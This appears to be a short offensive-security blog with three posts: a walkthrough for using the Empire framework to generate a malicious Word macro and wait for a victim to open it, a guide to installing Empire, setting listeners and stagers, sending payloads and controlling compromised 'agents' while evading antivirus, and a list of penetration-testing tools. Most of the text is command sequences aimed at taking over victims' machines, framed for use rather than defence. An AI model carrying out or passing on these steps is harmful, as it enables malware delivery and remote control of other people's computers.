j3ssie's Blog

[*] Hack windows through Office file using powershell attack [*] - You need to install Empire to create macro code (check video Config Empire ). - Config listener on empire:   ./empire  listeners  uselisteners http_com  set Name <listener_name>  set Port <listener_port>  execute   - Create macro code:    usestager windows/macro < listener_name >  set OutFile <Output_path>  execute - Embedded macro to Office file:   Word --> View --> Macro --> Copy your macro code. - Wait for victim run office file. => And you got a victim. [*] Video Demo: 

[*] How to config and use Empire 2.0 to perform powershell attack [*] [!] Note:  PowerShell can be run in memory where antivirus can’t see it, so it  obviously bypass antivirus. - Clone and install Empire.  git clone https://github.com/EmpireProject/Empire  cd Empire/setup  ./install.sh - How to use Listener.    ./empire  listeners  uselisteners <type_of_listener>  set Name <listener_name>  set Port <listener_port>  set DefaultDelay <delay_time>  info  execute - How to use stager.  main  usestager <stager_name> < listener_name >  info  [set <variable> <value>]  [info]  execute => Payload have been create. - Send payload to your victim. - Wait for victim run payload and get agents. - Interact with agent.  agents  interact <agents_name>  rename <agents_name_you_want>  usemodule <module_name>  execute Video Demo

[*] Today, I'm gonna share list of tool that I usually use while pentesting. Infomation Gathering and Reconnaisance Sn1per Datasploit Discover script Recon-ng Google Hacking Maltegoce Scanning  Nmap Knockpy Dirb Dirsearch Masscan Nessus Acunetix Exploitation Metasploit Sqlmap Burp Suite TheFatRat Veil-Evasion Custom script on Internet such as Exploit-DB Maintain Access Backdoor factory Netcat Empire